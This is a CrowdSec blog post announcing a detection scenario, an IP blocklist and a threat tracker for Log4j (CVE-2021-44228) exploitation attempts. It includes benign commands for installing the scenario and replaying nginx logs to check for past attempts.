CrowdSec

CrowdSec Blog

Detect and block Log4j exploitation attempts with CrowdSec

If you work in Infosec, you had a very lousy weekend. And that’s because of the Log4j zero-day vulnerability (CVE-2021-44228) that was discovered. We had no choice but to roll up our sleeves to help our community before things got messier than they already were. 

As a result, we have released a scenario that will help you detect and block exploitation attempts of the vulnerability. This new scenario can be directly downloaded from our Hub and installed in a blink of an eye. Check this quick video to see the plugin in action:

As CrowdSec is all about crowd power and given the size of our quickly growing network, we are collecting a lot of IP addresses attempting to exploit this vulnerability. You can check the list here. It is updated several times a day and, needless to say, you should block the ones that are “validated”.

Those IP addresses were curated by our consensus algorithm, meaning they had a lot of votes against them coming from our user network. The ones in “not enough data” state are highly suspicious but can still contain some false positives, up to you. The ones categorized as “benign” are IPs used by people that usually are on the good side of the fence, they probably scan to help and not to undermine.

Alternatively, you can use our replay mode to analyze your servers’ logs to check if an exploitation of Log4j was attempted at your place, by who and when, using the appropriate scenario and the below command line:

sudo cscli hub updatesudo cscli scenarios install crowdsecurity/apache_log4j2_cve-2021-44228
sudo systemctl reload crowdsec

# sudo crowdsec --dsn "file://" -no-api --type 
sudo crowdsec --dsn "file:///var/log/nginx/access.log" -no-api --type nginx

sudo cscli alerts list --scenario crowdsecurity/apache_log4j2_cve-2021-44228

We also published a real-time Log4j threat tracker, where you can visualize critical data such as most used Autonomous Systems (AS) by cybercriminals trying to exploit the vulnerability, the IP list of course with related country and number of threats, as reported by the CrowdSec community.

Let’s band together and bring our environments back to optimum security. 

You may also like

Protect Your Applications with AWS WAF and CrowdSec: Part I
Tutorial

Protect Your Applications with AWS WAF and CrowdSec: Part I

Learn how to configure the AWS WAF Remediation Component to protect applications running behind an ALB that can block both IPs and countries.

Protect Your Serverless Applications with AWS WAF and CrowdSec: Part II
Tutorial

Protect Your Serverless Applications with AWS WAF and CrowdSec: Part II

Learn how to protect your serverless applications hosted behind CloudFront or Application Load Balancer with CrowdSec and the AWS WAF.

Securing A Multi-Server CrowdSec Security Engine Installation With HTTPS
Tutorial

Securing A Multi-Server CrowdSec Security Engine Installation With HTTPS

In part II of this series, you learn about the three different ways to achieve secure TLS communications between your CrowdSec Security Engines in a multi-server setup.